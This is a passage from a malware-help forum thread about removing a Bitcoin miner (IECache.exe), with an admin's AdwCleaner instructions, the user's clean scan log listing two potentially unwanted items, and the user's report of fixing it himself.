\\?\Volume{6f8d5729-a966-4ecc-b6e9-1c18b55921fd}\ () (Fixed) (Total:0.09 GB) (Free:0.07 GB) FAT32

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 1863 GB) (Disk ID: 3677D62D)
Partition 1: (Not Active) - (Size=993 KB) - (Type=42)
Partition 2: (Active) - (Size=1863 GB) - (Type=42)
Partition 3: (Not Active) - (Size=1112 KB) - (Type=42)

========================================================
Disk: 1 (Size: 465.8 GB) (Disk ID: BEFAAE3A)

Partition: GPT.

==================== End of Addition.txt ============================

Rudy
Site Admin
Posts: 119428
Registered: 30 Oct 2003 13:42
Location: Plzeň

Re: BitCoin Miner - IECache.exe

#3 Post by Rudy »

Hello!
Run this utility:
Save AdwCleaner to your desktop: https://malwarebytes.com/adwcleaner/ or http://www.bleepingcomputer.com/download/adwcleaner/

close all programs
accept the license terms (EULA) by clicking I agree
right-click the AdwCleaner icon and choose Run as administrator (on Win XP just launch it with a double-click)
click Scan now, then Clean and Repair
after the restart the log will pop up (or you can find it in C:\AdwCleaner\Logs\AdwCleaner[Cxx].txt); copy its contents into your next reply

Post questions and logs only in your own threads. Private messages, ICQ and e-mails are not for solving your problems.

Please support our forum: https://platba.viry.cz/payment/.

e-mail: rudy(at)forum.viry.cz

Warning:
Before disinfecting your PC, back up your important data (mail, contacts, documents, photos, videos, music, etc.). Besides its "visible" activity, a virus can damage the system!

Once your problem is resolved, the thread will be locked. The same applies if it is inactive for more than 14 days. If you want the thread reactivated, write to me at the e-mail address given above.

Cryman
Visitor
Posts: 6
Registered: 08 Nov 2014 12:18

Re: BitCoin Miner - IECache.exe

#4 Post by Cryman »

Sorry, here is the log

# -------------------------------
# Malwarebytes AdwCleaner 7.2.2.0
# -------------------------------
# Build: 07-17-2018
# Database: 2018-08-23.8
# Support: https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Scan
# -------------------------------
# Start: 08-24-2018
# Duration: 00:00:13
# OS: Windows 10 Pro
# Scanned: 41805
# Detected: 2


***** [ Services ] *****

No malicious services found.

***** [ Folders ] *****

No malicious folders found.

***** [ Files ] *****

No malicious files found.

***** [ DLL ] *****

No malicious DLLs found.

***** [ WMI ] *****

No malicious WMI found.

***** [ Shortcuts ] *****

No malicious shortcuts found.

***** [ Tasks ] *****

No malicious tasks found.

***** [ Registry ] *****

No malicious registry entries found.

***** [ Chromium (and derivatives) ] *****

PUP.Optional.Legacy oiokahphinmbmakkehgelkmpolmnbkdh

***** [ Chromium URLs ] *****

PUP.Optional.Legacy 537qq.com

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries found.

***** [ Firefox URLs ] *****

No malicious Firefox URLs found.


AdwCleaner[S00].txt - [1277 octets] - [24/08/2018 21:56:49]

########## EOF - C:\AdwCleaner\Logs\AdwCleaner[S01].txt ##########

Cryman
Visitor
Posts: 6
Registered: 08 Nov 2014 12:18

Re: BitCoin Miner - IECache.exe

#5 Post by Cryman »

Thanks for the effort, but in the end I removed the virus myself, though without your help I would not have figured it out. I removed the virus with a combination of Malwarebytes, which showed me the infected files, and thanks to the AIO package Windows Repair Toolbox and the use of the FreeFixer utility, followed by removing the found files in Malwarebytes. Thank you, you can lock the thread.

Rudy
Site Admin
Posts: 119428
Registered: 30 Oct 2003 13:42
Location: Plzeň

Re: BitCoin Miner - IECache.exe

#6 Post by Rudy »

Glad to help. :-)

Locked